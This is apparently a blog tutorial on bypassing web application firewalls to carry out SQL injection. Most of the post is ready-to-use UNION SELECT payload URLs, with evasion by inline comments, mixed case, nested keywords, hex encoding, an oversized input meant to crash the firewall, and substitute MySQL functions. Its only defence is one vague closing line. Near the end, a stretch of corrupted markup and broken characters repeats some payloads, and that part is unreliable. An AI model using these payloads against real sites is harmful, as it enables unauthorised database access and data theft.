SQLi Attack

First Understand How SQLi Attacks are Done!!

Resolve Accordingly:-

This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.xyzz.com/index.php?page_id=-15 UNION SELECT 1,2,3,4….
(We get a 403 Error!)


Basic/Simple Methods:

First, of course, we need to know the Basic Methods to bypass WAF.
1) Comments:
You can use comments to bypass WAF:
http://www.xyzz.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4….
(First Method that can Bypass WAF)
However, most WAF identify this method so they still show a “Forbidden” Error…

2) Change the Case of the Letters:
You can also change the Case of the Command:
http://www.xyzz.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4….
(Another Basic Method to Bypass WAF!)
However, as before, this trick is also detected by most WAF!

3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
http://www.xyzz.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4….
This method is not detectable by many Web Application Firewalls!
4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:

http://www.xyzz.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4….
(The “union” and the “select” will be removed, so the final result will be: “UNION SELECT”  )
This method doesn’t work on ALL Firewalls, as only some of them remove the “UNION” and the “SELECT” commands when they are detected!
5) Inline Comments:
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
http://www.xyzz.com/index.php?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
(The %55 is equal to “U” and %53 to “S”. See more on the Advanced Section….)
I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!

1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
http://www.xyzz.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4….
(( You can test if the WAF can be crashed by typing:
?page_id=null%0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/+1,2,3,4….
If you get a 500, you can exploit it using the Buffer Overflow Method! ))

2) Replace Characters with their HEX Values:
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
http://www.xyzz.com/index.php?page_id=-15 /*!u%6eion*/ /*!se%6cect*/ 1,2,3,4….
(which means “union select”)
Text to Hex Encoder (Choose the “Hex Encoded for URL” result!): http://www.swingnote.com/tools/texttohex.php

3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:

COMMAND | WHAT TO USE INSTEAD

@@version       | version()
concat()           | concat_ws()  --> Difference between concat() and concat_ws()
group_concat() | concat_ws()

Learning MySQL Really helps on such issues! 


4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
This firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
http://www.xyzz.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4…
(If the Firewall removes the “*”, the result will be: 15+union+select….)
So, if you find such a silly function, you can exploit it, in this way! :-D
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)….
-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….
-15+union (select 1,2,3,4…)
erit; v^ c l �� Py� aseline;">-15+(uNioN+SeleCT)+…
-15+(UnI)(oN)+(SeL)(ecT)+….

-15+union (select 1,2,3,4…)

Now,For Preventing Block The Words Like Select,UNION,ALL etc....Block Special Symbols....etc...

Hope It Helped!!! 

1 comment: